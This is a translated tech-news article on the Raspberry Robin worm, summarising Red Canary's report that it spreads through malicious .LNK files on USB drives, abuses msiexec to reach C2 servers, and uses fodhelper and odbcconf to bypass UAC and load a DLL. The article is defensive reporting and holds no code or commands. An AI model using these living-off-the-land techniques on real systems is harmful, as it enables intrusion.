Home
Tech info
Technology
Science
Life
Application
Electric
Program
Mobile
Windows 10
Windows 11Detecting a new strain of malicious code that abuses Windows Installer to deploy infection activities
Currently, this malicious code is found in the network of a series of global organizations and businesses, mainly operating in the fields of technology and manufacturing.
Preliminary investigation results from Red Canary show that Raspberry Robin spreads to target Windows systems when an infected USB drive contains a malicious .LNK file. Once attached, it creates a new process using cmd.exe to launch a malicious file hosted in-place.
Raspberry Robin abuses Microsoft Standard Installer (msiexec.exe) to gain access to its control and control servers (C2 server). The malicious code is likely hosted on compromised QNAP devices and uses TOR exit nodes as additional C2 infrastructure.
"While msiexec.exe downloads and executes legitimate installer packages, malicious actors also leverage it to distribute malicious code. Raspberry Robin uses msiexec.exe to attempt to communicate externally with an external network malicious domain for control and control purposes," Red Canary said.
The team suspects that Raspberry Robin installs malicious DLL files on compromised systems to prevent them from being deleted between reboots. It launches this DLL file with the help of 2 other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows Settings) and odbcconf (a tool for configuring ODBC drivers). ). fodhelper will allow malicious code to bypass User Account Control (UAC), while odbcconf will help execute and configure the DLL.
Although the Red Canary team has conducted close testing on the infected systems, there are still some questions that need to be answered.
First and foremost, researchers have yet to determine how or where Raspberry Robin was able to infect external drives to keep it functioning. While this could theoretically happen in an offline environment, the odds are not high.
'We also don't know why Raspberry Robin installed a malicious DLL,' the Red Canary researchers said. "One theory is that this could be an attempt by malicious code to establish persistence on an infected system. However, additional information will be needed to build confidence in that hypothesis."
Since there is no information about the malicious activities at the end of Raspberry Robin, there is one more question that needs to be answered: What is the real goal of the malicious code operators'. These will be conundrums that researchers must clarify step by step!
Samuel DanielYou should read it
- Fileless malware - Achilles heel of traditional antivirus software
- Researchers create malware based on artificial intelligence
- Threats and risks from malware on USB Flash
- 14 games on the App Store contain malicious code, iPhone users be careful
- Malicious Code EvilGnome attacks Linux systems with many rare tricks
- Android apps contain malicious code that uses motion sensors to avoid detection
- 2022 could be the year of Linux malware
- Detecting new malicious code capable of 'evading' most anti-virus software
May be interested
- Risk of ransomware infection when downloading crack software online
researchers from cybersecurity firm sophos have discovered another malicious code distribution network hiding in the shadow of cracked software. because of wanting to use software without paying royalties, many people have become victims of cybercrime. - 14 games on the App Store contain malicious code, iPhone users be carefulsecurity researchers wandera recently discovered 14 games linked to a server once used to control malware golduck that made the android world chaotic last year.
- After WannaCry, Petya's 'extortion' malicious code is raging, this is a remedy to preventthe 'blackmail' malicious code called petya, which appeared under the new version of petrraprap, is similar in effect to the wannacry malicious code, causing the computer system of many multinational companies to be shattered. according to the initial record, these first countries infected with malicious code include ukraine, russia, britain and india.
- Malicious code is growing upsecurity firm mcafee warns that malicious code is currently on the way to prepare to reach a new level of complexity and professionalism. not only the malicious code and adware are now becoming a professionally distributed service
- Microsoft allows users to reactivate Windows App installermicrosoft has just allowed enterprise administrators to re-enable the msix ms-appinstaller protocol handler. windows app installer used to be disabled to avoid being abused by the emotet malware.
- Warning: Detecting a campaign to spread malicious code GandCrab 5.2 into Vietnam via fake email of the Ministry of Public Securityvietnam computer emergency response center (vncert) has sent a dispatch to member units informing that there is a campaign to distribute malicious code to extort gandcrab 5.2 into vietnam and southeast asian countries. .
- How to turn off Windows Installer to block MSI packagewindows installer is a background service, which manages the installation and uninstallation of msi-based programs. to block the msi installer, you can turn off windows installer using group policy or edit the registry.
- Trojan infection when using KakaoTalktrend micro, a security firm in japan, recently discovered kakaotalk and many other messaging applications are becoming targets of hackers 'attacks, threatening users' information security.
- How to fix 'The Installer Has Encountered an Unexpected Error 2203' error on Windowsthere are different types of installer errors, but if your error carries code 2203, it means the user account doesn't have enough permissions to install the software.
- Detecting malicious viruses in the application has more than 100 million downloadsthe google play store removed the camscanner pdf application running android operating system by cc intelligence corporation in china after discovering that it recently spread a malicious virus.
Attack the network
- Warning: Ransomware is spreading through fake malicious Windows updates
- Warning: Quantum Ransomware is being rapidly deployed in lightning attacks
- HP publishes a series of critical vulnerabilities in the Teradici PCoIP protocol
- Notorious hacker group Hafnium deployed malicious code to target Windows, Microsoft stood still
- New banking malware discovered that can remotely control Android devices
- Malware spreads through crack software specializing in stealing Facebook, Instagram, and Twitter accounts
Warning: Ransomware is spreading through fake malicious Windows updates
Warning: Quantum Ransomware is being rapidly deployed in lightning attacks
HP publishes a series of critical vulnerabilities in the Teradici PCoIP protocol
Notorious hacker group Hafnium deployed malicious code to target Windows, Microsoft stood still
New banking malware discovered that can remotely control Android devices
Malware spreads through crack software specializing in stealing Facebook, Instagram, and Twitter accounts